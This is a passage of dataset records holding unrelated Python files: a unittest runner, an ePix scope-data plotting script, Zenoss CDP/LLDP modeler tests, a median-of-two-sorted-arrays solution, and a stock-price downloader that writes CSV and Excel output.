timed-out')\n\tparser.add_argument('--base_url', default='www.autotrack.nl',type=str)\n\t\n\tparser.add_argument('--totalloops', type=int,default=1)\n\tparser.add_argument('--deeperloops', type=int,default=10)\n\tparser.add_argument('-v',action='store_true',help='unittest: Verbose output')\n\tparser.add_argument('-q',action='store_true',help='unittest: Quiet output')\n\tparser.add_argument('-f',action='store_true',help='unittest: Stop on first fail or error')\n\tparser.add_argument('-c',action='store_true',help='unittest: Catch ctrl-C and display results so far')\n\tparser.add_argument('-b',action='store_true',help='unittest: Buffer stdout and stderr during tests')\n\tparser.add_argument('-s',help=\"unittest: Directory to start discovery ('.' 
default)\")\n\tparser.add_argument('-p',help=\"unittest: Pattern to match tests ('test*.py' default)\")\n\tparser.add_argument('-t',help='unittest: Top level directory of project (defaults to start directory)')\n\tparser.add_argument('unittest_args', nargs='*')\n\t\t\t\t\t\t\n\targs = parser.parse_args()\n\n\t# TODO: Go do something with args\n\tlogroot = args.logroot\n\tglobal_browser = args.browser\n\tdeeperloops = args.deeperloops\n\ttotalloops = args.totalloops\n\tloglevel = logging.INFO\n\tif args.loglevel == 'critical' :\n\t\tloglevel = logging.CRITICAL\n\telif args.loglevel == 'error' :\n\t\tloglevel = logging.ERROR\n\telif args.loglevel == 'warning' :\n\t\tloglevel = logging.WARNING\t\t\n\telif args.loglevel == 'info' :\n\t\tloglevel = logging.INFO\n\telif args.loglevel == 'debug' :\n\t\tloglevel = logging.DEBUG\n\tlogging.getLogger().setLevel(loglevel)\n\t\t\n\ttry:\n\t\tpage_timeout = int(args.pagetimeout)\n\texcept:\n\t\tlogging_warning(\"pagetimeout in commandline is not numeric ('\"+args.pagetimeout+\"') setting to default 10\")\n\t\tpage_timeout = 10\n\tbase_url = 'http:////'+args.base_url\n\t\n\tunittest_arguments = []\n\tif args.v == True : unittest_arguments.append('-v')\n\tif args.q == True : unittest_arguments.append('-q') \n\tif args.f == True : unittest_arguments.append('-f')\n\tif args.c == True : unittest_arguments.append('-c')\n\tif args.b == True : unittest_arguments.append('-b')\n\tif args.s != None : \n\t\tunittest_arguments.append( '-s')\n\t\tunittest_arguments.append(args.s)\n\tif args.p != None : \n\t\tunittest_arguments.append( '-p')\n\t\tunittest_arguments.append(args.p)\n\tif args.t != None : \n\t\tunittest_arguments.append( '-t')\n\t\tunittest_arguments.append(args.t)\n\tfor arg in args.unittest_args:\n\t\tunittest_arguments.append(arg)\n\t\t\n\t# Now set the sys.argv to the unittest_args (leaving sys.argv[0] alone)\n\tsys.argv[1:] = unittest_arguments\n\n\tsetconfig('logroot', args.logroot)\n\tsetconfig('global_browser', args.browser)\n\tsetconfig('deeperloops', args.deeperloops)\n\tsetconfig('totalloops', args.totalloops)\n\tsetconfig('page_timeout', int(args.pagetimeout))\n\tsetconfig('base_url', 'http:////'+args.base_url)\n\n\tprint('Browser : '+str(args.browser))\n\tprint('logroot : '+str(args.logroot))\n\tprint('loglevel : '+str(args.loglevel))\n\tprint('page timeout : '+str(args.pagetimeout))\n\tprint('base_url : '+str(args.base_url))\n\tprint('total loops : '+str(args.totalloops))\n\tprint('deeper loops : '+str(args.deeperloops))\n\n\tsearchstring = ''\n\tif len(sys.argv) >= 2:\n\t\tsearchstring=sys.argv[1]\n\tsuite = unittest.TestLoader().discover(cur_dir() + '\\\\tests', pattern='test_'+str(searchstring)+'*.py', top_level_dir=None)\n\tunittest.TextTestRunner(verbosity=2).run(suite)\n\t# unittest.main()\n\t\n","sub_path":"at_test.py","file_name":"at_test.py","file_ext":"py","file_size_in_byte":4325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"207517723","text":"#-----------------------------------------------------------------------------\n# Title : read images from file script\n#-----------------------------------------------------------------------------\n# File : read_image_from_file.py\n# Created : 2017-06-19\n# Last update: 2017-06-21\n#-----------------------------------------------------------------------------\n# Description:\n# Simple image viewer that enble a local feedback from data collected using\n# ePix cameras. 
The initial intent is to use it with stand alone systems\n#\n#-----------------------------------------------------------------------------\n# This file is part of the ePix rogue. It is subject to \n# the license terms in the LICENSE.txt file found in the top-level directory \n# of this distribution and at: \n# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. \n# No part of the ePix rogue, including this file, may be \n# copied, modified, propagated, or distributed except according to the terms \n# contained in the LICENSE.txt file.\n#-----------------------------------------------------------------------------\n\nimport os, sys, time\nimport numpy as np\n#import ePixViewer.Cameras as cameras\n#import ePixViewer.imgProcessing as imgPr\n# \nimport matplotlib \nmatplotlib.use('QT4Agg')\nimport matplotlib.pyplot as plt\nimport h5py\n\n#matplotlib.pyplot.ion()\nNUMBER_OF_PACKETS_PER_FRAME = 1\n#MAX_NUMBER_OF_FRAMES_PER_BATCH = 1500*NUMBER_OF_PACKETS_PER_FRAME\nMAX_NUMBER_OF_FRAMES_PER_BATCH = -1\n\n\n##################################################\n# Global variables\n##################################################\nPLOT_SET_HISTOGRAM = False\nPLOT_ADC_VS_N = True\n\n##################################################\n# Dark images\n##################################################\n#if (len(sys.argv[1])>0):\n# filename = sys.argv[1]\n#else:\n#filename = '/data/cryoData/backend/pulse_pseudoScope.dat'\nfilename = '/data/cryoData/coldMeasurements/singleChRamp.dat'\nfilename = '/data/cryoData/frontend/atest_pulser_test_analogMonitor_and_image.dat'\nfilename = '/data/cryoData/EXO_Lab/Full_Chain/Pulser_Linearity/Pulser_lin_Ch_0_8_3f_37_0x13ad_t3p6u_g3x0.dat'\nf = open(filename, mode = 'rb')\n\nfile_header = [0]\nnumberOfFrames = 0\npreviousSize = 0\nwhile ((len(file_header)>0) and ((numberOfFrames>24)==2: #image packet only, 2 mean scope data\n if (numberOfFrames == 0):\n allFrames = [newPayload.copy()]\n else:\n newFrame = [newPayload.copy()]\n allFrames = np.append(allFrames, newFrame, axis = 0)\n numberOfFrames = numberOfFrames + 1 \n previousSize = file_header\n \n if (numberOfFrames%5000==0):\n print(\"Read %d frames\" % numberOfFrames)\n\n except Exception: \n e = sys.exc_info()[0]\n #print (\"Message\\n\", e)\n print(\"End of file.\")\n print ('size', file_header, 'previous size', previousSize)\n print(\"numberOfFrames read: \" ,numberOfFrames)\n\n\n\n##################################################\n#from here on we have a set of traces to work with\n##################################################\nnp.savetxt(os.path.splitext(filename)[0] + \"_traces\" + \".csv\", allFrames, fmt='%d', delimiter=',', newline='\\n')\n\n#%%\nif PLOT_ADC_VS_N :\n \n # All single and all traces\n plt.figure(1)\n plt.subplot(211)\n plt.title('ADC value - single trace')\n plt.plot(allFrames[1,20:-20])\n\n plt.subplot(212)\n plt.plot(np.transpose(allFrames[:, 20:-20]))\n plt.title('ADC value - all traces')\n plt.show()\n\n \n\n#%%\ntestSignal = allFrames[1]\nprint(testSignal[20:30])\nvhex = np.vectorize(hex)\nprint(vhex(testSignal[20:30]))\nLSBArray = np.bitwise_and(testSignal,255)\nMSBArray = np.bitwise_and(testSignal,65280)\n#print(vhex(LSBArray[20:30]))\n#print(vhex(MSBArray[20:30]))\nnewSignal = MSBArray[0:-1] + LSBArray[1:]\nnewSignal2 = MSBArray[1:] + LSBArray[0:-1]\ndifSignal = testSignal[:-1] - newSignal\nprint(vhex(newSignal[20:30]))\n\nif PLOT_ADC_VS_N :\n plt.figure(2)\n plt.subplot(311)\n plt.title('ADC value - single trace')\n plt.plot(testSignal[20:-20])\n\n 
plt.subplot(312)\n plt.plot(np.transpose(newSignal[20:-20]))\n plt.title('ADC value - all traces')\n\n plt.subplot(313)\n plt.plot(np.transpose(newSignal2[20:-20]))\n plt.title('ADC value - all traces')\n \n plt.show()\n#%%\nallFramesInVolts = allFrames[:,20:-20]*(-2.5/16384)+2.5\nif PLOT_ADC_VS_N :\n \n # All single and all traces\n plt.figure(1)\n plt.subplot(211)\n plt.title('ADC value - single trace')\n plt.plot(allFramesInVolts[1])\n\n plt.subplot(212)\n plt.plot(np.transpose(allFramesInVolts))\n plt.title('ADC value - all traces')\n plt.show()\n \n#%%\nmaxValues = np.max(allFramesInVolts,1)\nif PLOT_ADC_VS_N :\n \n # All single and all traces\n plt.figure(1)\n plt.subplot(211)\n plt.title('ADC value - single trace')\n plt.plot(maxValues[0:666])\n\n plt.subplot(212)\n plt.plot(np.transpose(allFramesInVolts[112,0:1023]))\n plt.plot(np.transpose(allFramesInVolts[300,0:1023]))\n plt.plot(np.transpose(allFramesInVolts[484,0:1023]))\n plt.title('ADC value - all traces')\n plt.show()\n \n \n#%%\n# the histogram of the data\ncentralValue = 0\nif PLOT_SET_HISTOGRAM :\n nbins = 100\n EnergyTh = -50\n n = np.zeros(nbins)\n for i in range(0, imgDesc.shape[0]):\n # n, bins, patches = plt.hist(darkSub[5,:,:], bins=256, range=(0.0, 256.0), fc='k', ec='k')\n # [x,y] = np.where(darkSub[i,:,32:63]>EnergyTh)\n # h, b = np.histogram(darkSub[i,x,y], np.arange(-nbins/2,nbins/2+1))\n # h, b = np.histogram(np.average(darkSub[i,:,5]), np.arange(-nbins/2,nbins/2+1))\n dataSet = darkSub[i,:,5]\n h, b = np.histogram(np.average(dataSet), np.arange(centralValue-nbins/2,centralValue+nbins/2+1))\n n = n + h\n\n plt.bar(b[1:nbins+1],n, width = 0.55)\n plt.title('Histogram')\n plt.show()\n\n\n\n\n\n\n\n\n\n \n\n\n","sub_path":"software/scripts/imgProc/read_scope_data_from_file_v2.py","file_name":"read_scope_data_from_file_v2.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"409439115","text":"##############################################################################\n#\n# Copyright (C) Zenoss, Inc. 
2015, all rights reserved.\n#\n# This content is made available according to terms specified in\n# License.zenoss under the directory where your Zenoss product is installed.\n#\n##############################################################################\n\nfrom mock import Mock, sentinel\n\nfrom Products.ZenTestCase.BaseTestCase import BaseTestCase\n\nfrom ZenPacks.zenoss.Layer2.modeler.plugins \\\n .zenoss.snmp.CDPLLDPDiscover import _extract_cdp_lldp_maps\n\ncdpCacheEntry1 = {\n '10648.28': {\n 'cdpCacheAddress': '\\nW\\xfe\\x07',\n 'cdpCacheAddressType': 1,\n 'cdpCacheDeviceId': '08cc6843e573',\n 'cdpCacheDevicePort': 'gi52',\n 'cdpCacheNativeVLAN': 1,\n 'cdpCachePlatform': 'asdf'\n },\n}\n\nlldpRemEntry1 = {\n '0.100.22': {\n 'lldpRemPortDesc': '',\n 'lldpRemPortId': 'gi52',\n 'lldpRemSysDesc': '',\n 'lldpRemSysName': 'asdf'\n },\n}\n\ncdpCacheEntry2 = {\n '68.4': {\n 'cdpCachePlatform': 'N5K-C56128P',\n 'cdpCacheAddressType': 1,\n 'cdpCacheDevicePort': 'Ethernet1/34',\n 'cdpCacheNativeVLAN': 1,\n 'cdpCacheDeviceId': 'PVH00ADS02(FOC2048R0QV)',\n 'cdpCacheAddress': '\\n\\xd4\\x01\\x05'\n },\n '61.3': {\n 'cdpCachePlatform': 'N5K-C56128P',\n 'cdpCacheAddressType': 1,\n 'cdpCacheDevicePort': 'Ethernet1/34',\n 'cdpCacheNativeVLAN': 1,\n 'cdpCacheDeviceId': 'PVH00ADS01(FOC2048R0MF)',\n 'cdpCacheAddress': '\\n\\xd4\\x01\\x04'\n },\n}\n\nlldpRemEntry2 = {\n '0.60.2': {\n 'lldpRemSysName': 'PVH00ADS02',\n 'lldpRemSysDesc': 'Cisco NX-OS(tm) n6000, Software (n6000-uk9), Version 7.3(7)N1(1), RELEASE SOFTWARE Copyright (c) 2002-2012, 2016-2017 by Cisco Systems, Inc. Compiled 1/26/2020 22:00:00',\n 'lldpRemPortDesc': 'Ethernet1/34',\n 'lldpRemPortId': 'Eth1/34'\n },\n '0.3.10': {\n 'lldpRemSysName': 'AVX080739',\n 'lldpRemSysDesc': '',\n 'lldpRemPortDesc': '',\n 'lldpRemPortId': '\\xa0\\t\\xed\\x08\\x079'\n },\n '0.53.1': {\n 'lldpRemSysName': 'PVH00ADS01',\n 'lldpRemSysDesc': 'Cisco NX-OS(tm) n6000, Software (n6000-uk9), Version 7.3(7)N1(1), RELEASE SOFTWARE Copyright (c) 2002-2012, 2016-2017 by Cisco Systems, Inc. 
Compiled 1/26/2020 22:00:00',\n        'lldpRemPortDesc': 'Ethernet1/34',\n        'lldpRemPortId': 'Eth1/34'\n    },\n    '0.5.9': {\n        'lldpRemSysName': '',\n        'lldpRemSysDesc': '',\n        'lldpRemPortDesc': '',\n        'lldpRemPortId': '\\xc44k{\\xbe\\xd3'\n    },\n    '0.6.11': {\n        'lldpRemSysName': '',\n        'lldpRemSysDesc': '',\n        'lldpRemPortDesc': '',\n        'lldpRemPortId': '\\xdcJ>\\x8b\\xf4\\xd5'\n    },\n    '0.1.4': {\n        'lldpRemSysName': '',\n        'lldpRemSysDesc': '',\n        'lldpRemPortDesc': '',\n        'lldpRemPortId': '\\x88Q\\xfb?a\\x95'\n    },\n    '0.4.7': {\n        'lldpRemSysName': 'AVX081116',\n        'lldpRemSysDesc': '',\n        'lldpRemPortDesc': '',\n        'lldpRemPortId': '\\xa0\\t\\xed\\x08\\x11\\x16'\n    },\n    '0.2.8': {\n        'lldpRemSysName': 'AVXB0C617',\n        'lldpRemSysDesc': '',\n        'lldpRemPortDesc': '',\n        'lldpRemPortId': '\\xd4xV\\xb0\\xc6\\x17'\n    },\n}\n\n\nclass TestCDPLLDPDiscover(BaseTestCase):\n\n    def test_extraction_of_both(self):\n        res = _extract_cdp_lldp_maps({\n            'cdpCacheEntry': cdpCacheEntry1,\n            'lldpRemEntry': lldpRemEntry1\n        })\n        self.assertEqual(sorted(res), [{\n            'description': '',\n            'device_port': 'gi52',\n            'id': 'lldp_0.100.22',\n            'title': 'asdf'\n        }, {\n            'description': '',\n            'device_port': 'gi52',\n            'id': 'cdp_10648.28',\n            'ip_address': '10.87.254.7',\n            'location': '',\n            'native_vlan': 1,\n            'title': 'asdf'\n        }])\n\n    def test_cdp(self):\n        res = _extract_cdp_lldp_maps({\n            'cdpCacheEntry': cdpCacheEntry1,\n        })\n        self.assertEqual(res, [{\n            'description': '',\n            'device_port': 'gi52',\n            'id': 'cdp_10648.28',\n            'ip_address': '10.87.254.7',\n            'location': '',\n            'native_vlan': 1,\n            'title': 'asdf'\n        }])\n\n    def test_lldp(self):\n        res = _extract_cdp_lldp_maps({\n            'lldpRemEntry': lldpRemEntry1\n        })\n        self.assertEqual(res, [{\n            'description': '',\n            'device_port': 'gi52',\n            'id': 'lldp_0.100.22',\n            'title': 'asdf'\n        }])\n\n    def test_hex_lldp_rem_port_id_encoding(self):\n        res = _extract_cdp_lldp_maps({\n            'lldpRemEntry': lldpRemEntry2,\n            'cdpCacheEntry': cdpCacheEntry2,\n        })\n\n        self.assertEqual(res[5], {\n            'description': '',\n            'device_port': 'a009ed080739',\n            'id': 'lldp_0.3.10',\n            'title': 'AVX080739'\n        }\n        )\n\n\ndef test_suite():\n    from unittest import TestSuite, makeSuite\n    suite = TestSuite()\n    suite.addTest(makeSuite(TestCDPLLDPDiscover))\n    return suite\n","sub_path":"ZenPacks/zenoss/Layer2/tests/test_cdp_lldp_discover.py","file_name":"test_cdp_lldp_discover.py","file_ext":"py","file_size_in_byte":5154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"209079840","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 16 09:54:22 2017\r\n\r\n@author: harvey\r\n\"\"\"\r\n\r\n# Given two sorted integer arrays, find the median of the two arrays in\r\n# O(log(m+n)) time.\r\n\r\n# That is, the median of the array obtained by merging the two (duplicate\r\n# elements are kept while merging);\r\n# if the merged array has an odd number of elements, output the middle element;\r\n# if it has an even number, output the average of the two middle elements.\r\n\r\n# The overall idea is similar to finding the k smallest numbers in an unsorted\r\n# array. Using each array's own median, split the two arrays A and B into four\r\n# parts: A1, A2, B1 and B2. Now look for the kth smallest number among them.\r\n# If A's median is larger than B's median, the numbers in B1 are smaller than\r\n# those in A2 and B2, and smaller than some of the numbers in A1. In that case,\r\n# if k > len(A1)+len(B1), the kth number cannot be in B1: at most the numbers\r\n# in B1 plus part of A1 are smaller than it, i.e. fewer than len(A1)+len(B1) < k,\r\n# a contradiction. The other cases follow by the same reasoning.\r\n\r\nclass Solution(object):\r\n    def findMedianSortedArrays(self, nums1, nums2):\r\n        \"\"\"\r\n        :type nums1: List[int]\r\n        :type nums2: List[int]\r\n        :rtype: float\r\n        \"\"\"\r\n        length1 = len(nums1)\r\n        length2 = len(nums2)\r\n        k = (length1+length2)//2  # floor division\r\n        if (length1 + length2) % 2 == 0:  # even count after merging: average the kth and (k-1)th elements\r\n            return (self.findK(nums1, nums2, k)+self.findK(nums1, nums2, k-1)) / 2\r\n        else:  # odd count after merging: take the kth element directly\r\n            return self.findK(nums1, nums2, k)\r\n    \r\n    # Find the kth element (0-indexed) of the two sorted arrays merged\r\n    def findK(self, nums1, nums2, k):\r\n        if not nums1:  # nums1 is empty\r\n            return nums2[k]\r\n        if not nums2:  # nums2 is empty\r\n            
return nums1[k]\r\n        if k == 0:  # return the first element of the merged array\r\n            return min(nums1[0], nums2[0])\r\n        \r\n        length1 = len(nums1)\r\n        length2 = len(nums2)\r\n        if nums1[length1 // 2] > nums2[length2 // 2]:\r\n            if k > length1 // 2 + length2 // 2:  # the kth number cannot be in B1\r\n                return self.findK(nums1, nums2[length2//2 + 1:], k-length2 // 2 - 1)\r\n            else:  # the kth number cannot be in A2\r\n                return self.findK(nums1[:length1//2],nums2,k)\r\n        else:\r\n            if k > length1//2+length2//2:  # the kth number cannot be in A1\r\n                return self.findK(nums1[length1//2+1:],nums2,k-length1//2-1)\r\n            else:  # the kth number cannot be in B2\r\n                return self.findK(nums1,nums2[:length2//2],k)\r\n    \r\nif __name__ == \"__main__\":\r\n    print(Solution().findMedianSortedArrays([1,2],[1,2,3]))\r\n    print(Solution().findMedianSortedArrays([],[2,3]))\r\n    print(Solution().findMedianSortedArrays([1, 2, 3],[4, 5, 6]))\r\n    \r\n    ","sub_path":"median_of_two_sorted_arrays.py","file_name":"median_of_two_sorted_arrays.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"624798786","text":"#!/usr/bin/env python3\n\nfrom libs.ppsettings import pp_settings\n\nfrom libs.pptable import PpTable\nfrom libs.ppgetallweekend import get_all_week_ends\nfrom libs.exceptions import RequestError, CopyError\nfrom libs.ppstdlib import create_dir_if_not\n\nimport pandas as pd\nfrom pandas import ExcelWriter\nfrom datetime import datetime as dt, timedelta\nfrom bs4 import BeautifulSoup as bs\nimport io\nimport requests\nimport os\nimport sys,gc\nfrom shutil import copyfile\nimport zipfile\n\n\n\ndef diff_df(df_source, df_dest, compare_cols=[]):\n\t# try:\n\t# print(compare_cols)\n\tif compare_cols:\n\t\tif not df_source.empty:\n\n\t\t\t# make a new 'compare' column in both data frames by joining the\n\t\t\t# compared column values into one string\n\t\t\tif len(compare_cols) == 1:\n\t\t\t\tdf_source['compare'] = df_source[compare_cols]\n\t\t\t\tdf_dest['compare'] = df_dest[compare_cols]\n\t\t\telse:\n\t\t\t\tdf_source['compare'] = df_source[compare_cols].apply(\n\t\t\t\t\tlambda x: ''.join(x), axis=1)\n\t\t\t\tdf_dest['compare'] = df_dest[compare_cols].apply(\n\t\t\t\t\tlambda x: ''.join(x), axis=1)\n\n\t\t\t# find all securities present in the new frame but not the existing one\n\t\t\tnew_symbol = set(df_source.groupby('compare').groups.keys(\n\t\t\t)) - set(df_dest.groupby('compare').groups.keys())\n\n\t\t\t\"\"\" print(len(df_dest.groupby('compare').groups.keys()))\n\t\t\tprint(len(df_source.groupby('compare').groups.keys()))\n\n\t\t\tprint(new_symbol) \"\"\"\n\t\t\t# select only the differing securities\n\t\t\tdf_source = df_source[df_source['compare'].isin(list(new_symbol))]\n\n\t\t\t# drop the compare column\n\t\t\tdf_source = df_source.drop('compare', axis=1)\n\t\t\"\"\" else:\n\t\t\t# Handle exception\n\texcept:\n\t\t# my exception message\n\telse: \"\"\"\n\treturn df_source\n\n\n
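# A minimal usage sketch of diff_df (my illustration; the frames and column\n# names below are invented, not part of this project):\n#   src = pd.DataFrame({'symbol': ['A', 'B', 'C'], 'close': ['1', '2', '3']})\n#   dst = pd.DataFrame({'symbol': ['A', 'B'], 'close': ['1', '2']})\n#   diff_df(src, dst, compare_cols=['symbol'])  # returns only the 'C' row\n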
Ignoring save....\".format(filename))\n\t\t\treturn\n\n\theader = True\n\tappend_write = 'w+'\n\tif doDiff:\n\t\tdf_exist = pd.DataFrame()\n\t\tappend_write = 'a' # append if already exists\n\t\theader = False\n\t\tif not os.path.exists(filename):\n\t\t\theader = True\n\t\t\topen(filename, \"w\") # make a new file if not\n\t\telse:\n\t\t\tdf_exist = pd.read_csv(filename, dtype=str, keep_default_na=False)\n\t\t\tdf_new = diff_df(df_new, df_exist, compare_cols)\n\n\tif not df_new.empty:\n\t\tdf_new.to_csv(filename, mode=append_write, index=False, header=header)\n\t\tprint(\"data has been saved successfully into {}\".format(filename))\n\t\treturn filename\n\treturn \"\"\n\n\ndef load_data_frame(filename, hardcheck=False):\n\tdf = pd.DataFrame()\n\ttry:\n\t\tif os.path.exists(filename):\n\t\t\tdf = pd.read_csv(filename, dtype=str, keep_default_na=False)\n\t\telse:\n\t\t\tif hardcheck:\n\t\t\t\traise OSError\n\t\t\telse:\n\t\t\t\treturn df\n\texcept OSError:\n\t\tprint('Source Path not found:', filename)\n\t\traise\n\telse:\n\t\treturn df\n\n# parent class\n\n\nclass PpSecurity:\n\turl = \"\"\n\tcolumns = []\n\tsettings = {}\n\texchange = \"\"\n\tmain_df = pd.DataFrame()\n\trawoutput = \"\"\n\tppoutput = \"\"\n\tcallPriFunc = \"\"\n\tmisspri = []\n\n\tdef set_url(self, url):\n\t\tif not url:\n\t\t\traise Exception('undefined url')\n\t\tself.url = url\n\t\t# print(self.url)\n\n\tdef __init__(self, edate, fdate=\"\"):\n\n\t\tself.settings = pp_settings()[self.exchange]\n\n\t\turl = self.settings[\"url\"][\"current\"].format(\n\t\t\tdt.strptime(edate, '%m%d%Y').strftime(\"%d%m%Y\"))\n\n\t\tif fdate != \"\":\n\t\t\tfdate, edate = edate, fdate\n\t\t\turl = self.settings[\"url\"][\"hist\"].format(dt.strptime(fdate, '%m%d%Y').strftime(\"%d-%b-%Y\"),\n\t\t\t\t\t\t\t\t\t\t\t\t\t dt.strptime(edate, '%m%d%Y').strftime(\"%d-%b-%Y\"))\n\n\t\tprint(url)\n\t\tself.set_url(url)\n\n\tdef copy_price(self, source, dest,intoDir=''):\n\n\t\tsource = self.settings['path']['pp']+intoDir+source+\".csv\"\n\t\tdest = self.settings['path']['pp']+intoDir+dest+\".csv\"\n\t\tif not os.path.exists(source):\n\t\t\traise CopyError('701', source)\n\t\tsource_df = pd.read_csv(source, delimiter=' *, *', engine='python',\n\t\t\t\t\t\t\t\tkeep_default_na=False, dtype=str)\n\n\t\tif not os.path.exists(dest):\n\t\t\t# adding exception handling\n\t\t\ttry:\n\t\t\t\tcopyfile(source, dest)\n\t\t\texcept IOError as e:\n\t\t\t\traise CopyError('703', e)\n\t\t\texcept:\n\t\t\t\traise CopyError('703', sys.exc_info())\n\t\t\t\n\t\telse:\n\t\t\tdest_df = pd.read_csv(dest, delimiter=' *, *', engine='python',\n\t\t\t\t\t\t\t\tkeep_default_na=False, dtype=str)\n\t\t\t\n\t\t\t# print(dest_df.info())\n\t\t\t# print(source_df[~source_df.symbol.isin(dest_df.symbol)].info())\n\t\t\tdest_df = pd.concat([dest_df,source_df[~source_df.symbol.isin(dest_df.symbol)]],ignore_index=True)\n\t\t\tdest_df.to_csv(dest, mode=\"w+\", index=False)\n\t\t\t# print(dest_df.info())\n\t\t\t# print(source_df.info())\n\n\t\t# pd.concat([sat, fri[~fri.symbol.isin(sat.symbol)]], ignore_index=True)\n\n\t\t\n\n\t\t# print()\n\t\t# print(self.settings['path']['pp']+dest+\".csv\")\n\n\n\n\t\"\"\"\n\tIn the event of a network problem (e.g. 
DNS failure, refused connection, etc), Requests will raise a ConnectionError exception.\n\n\tIn the event of the rare invalid HTTP response, Requests will raise an HTTPError exception.\n\n\tIf a request times out, a Timeout exception is raised.\n\n\tIf a request exceeds the configured number of maximum redirections, a TooManyRedirects exception is raised.\n\n\tAll exceptions that Requests explicitly raises inherit from requests.exceptions.RequestException\n\t\"\"\"\n\n\tdef request_url(self, url, stream = False):\n\t\tprint(\"Downloading from {}\".format(url))\n\t\ttry:\n\t\t\tif not stream:\n\t\t\t\tr = requests.get(url)\n\t\t\t\tr.raise_for_status()\n\t\t\t\treturn r.content\n\t\t\telse:\n\t\t\t\tr = requests.get(url,stream=True)\n\t\t\t\tr.raise_for_status()\n\t\t\t\treturn r\n\t\texcept requests.exceptions.ConnectionError as e:\n\t\t\tprint(\"connection error {} \".format(url))\n\t\t\traise RequestError('401', url)\n\t\texcept requests.exceptions.HTTPError as e:\n\t\t\tprint(\"HTTP error {} \".format(url))\n\t\t\tself.misspri.append(url);\n\t\t\traise RequestError('402', url)\n\t\texcept requests.exceptions.Timeout as e:\n\t\t\tprint(\"Timeout error {} \".format(url))\n\t\t\traise RequestError('403', url)\n\t\texcept requests.exceptions.TooManyRedirects as e:\n\t\t\tprint(\"Too Many Redirects error {} \".format(url))\n\t\t\traise RequestError('404', url)\n\t\texcept requests.exceptions.RequestException as e:\n\t\t\tprint(\"Request Exception error {} \".format(url))\n\t\t\traise RequestError('405', url)\n\n\tdef show(self):\n\t\tprint(self.main_df)\n\n\tdef save(self, isCopyRaw=True, doDiff=False, saveOnly=\"\", includeTime=False,intoDir = ''):\n\n\t\tprint(\"Saving prices ....\")\n\t\tif self.main_df.empty:\n\t\t\tprint(\"The downloaded file doesn't contain records\")\n\t\t\treturn\n\t\t\n\t\t# raw_df_columns = []\n\t\traw_df_columns=self.settings[\"ppformat\"].keys()\n\t\t\n\t\tfor k, df_new in self.main_df.groupby(self.settings[\"saveby\"]):\n\t\t\tdf_new=df_new.reset_index(drop=True)\n\t\t\tdateKey=dt.strptime(\n\t\t\t\tk.strip(), \"%d-%b-%Y\").strftime(\"%m%d%Y\")\n\t\t\tif saveOnly != \"\":\n\t\t\t\tif (dateKey == saveOnly):\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\trawPath=self.settings[\"path\"]['raw']\n\t\t\tppPath=self.settings[\"path\"]['pp']\n\n\n\t\t\tif intoDir != '':\n\t\t\t\trawPath += intoDir\n\t\t\t\tppPath += intoDir\n\t\t\t\tcreate_dir_if_not(rawPath)\n\t\t\t\tcreate_dir_if_not(ppPath)\n\t\t\t\trawPath += '/'\n\t\t\t\tppPath += '/'\n\t\t\t\t\n\n\t\t\trawPath += dateKey\n\t\t\tppPath += dateKey\n\t\t\t\n\t\t\tif includeTime:\n\t\t\t\ttimestr=dt.now().strftime(\"%H:%M:%S\")\n\t\t\t\trawPath += \"_\" + timestr\n\t\t\t\tppPath += \"_\" + timestr\n\t\t\t\n\t\t\tif isCopyRaw:\n\t\t\t\t# doDiff must be passed by keyword: passed positionally it would land in compare_cols\n\t\t\t\tself.rawoutput=save_if(rawPath + \".csv\", df_new, doDiff=doDiff, ignoreExist=True)\n\t\t\tself.ppoutput=save_if(ppPath+\".csv\", df_new[list(raw_df_columns)].rename(columns=self.settings[\"ppformat\"]),\n\t\t\t\t self.settings['duplicate'], doDiff)\n\n\tdef fill_holiday(self, edate):\n\t\tdestpath=self.settings[\"path\"]['pp'] + edate + \".csv\"\n\t\tedate=dt.strptime(edate, '%m%d%Y')\n\n\t\tadjustment={5: -1, 6: -2}.get(edate.weekday())\n\t\tif adjustment:\n\t\t\tedate += timedelta(days=adjustment)\n\n\t\tdf_exist=load_data_frame(\n\t\t\tself.settings[\"path\"]['pp'] + edate.strftime(\"%m%d%Y\") + \".csv\", hardcheck=True)\n\n\t\t# print(destpath)\n\t\theader=True\n\t\tdf_new=pd.DataFrame()\n\t\tif 
os.path.exists(destpath):\n\t\t\theader=False\n\n\t\tdf_new=load_data_frame(destpath)\n\n\t\tif df_new.empty:\n\t\t\tdf_new=df_exist\n\t\telse:\n\t\t\tdf_new=diff_df(df_exist, df_new, self.settings['duplicate'])\n\t\tif not df_new.empty:\n\t\t\tdf_new.to_csv(destpath, mode='a+', index=False, header=header)\n\t\t\tprint(\"data has been saved successfully into {}\".format(destpath))\n\n\tdef read_csv(self, path):\n\t\tself.main_df=pd.read_csv(path, delimiter=' *, *', engine='python', keep_default_na=False,\n\t\t\t\t\t\t\t\t\t\t\tdtype=str)\n\t\t# self.main_df = self.main_df.str.strip()\n\n\tdef make_spread_sheet(self, sourcedf=None, storein=\"\", groupby=\"\", sheetname=\"\"):\n\n\t\tsourcedf=self.main_df if sourcedf is None else sourcedf\n\t\tstorein=\"output\" if storein == \"\" else storein\n\t\tsheetname=\"sheet\" if sheetname == \"\" else sheetname\n\n\t\txlwriter=ExcelWriter(storein+'.xlsx')\n\n\t\tif not groupby:\n\t\t\tsourcedf.to_excel(xlwriter, sheetname)\n\t\t\txlwriter.save()  # without this the single-sheet workbook is never written to disk\n\t\telse:\n\t\t\tclass MyError(Exception):\n\t\t\t\t# Constructor or Initializer\n\t\t\t\tdef __init__(self, value):\n\t\t\t\t\tself.value=value\n\n\t\t\t\t# __str__ is to print() the value\n\t\t\t\tdef __str__(self):\n\t\t\t\t\treturn(repr(self.value))\n\n\t\t\ttry:\n\t\t\t\tif groupby not in sourcedf.columns:\n\t\t\t\t\traise(MyError(groupby))\n\n\t\t\t# Value of Exception is stored in error\n\t\t\texcept MyError as error:\n\t\t\t\tprint('A New 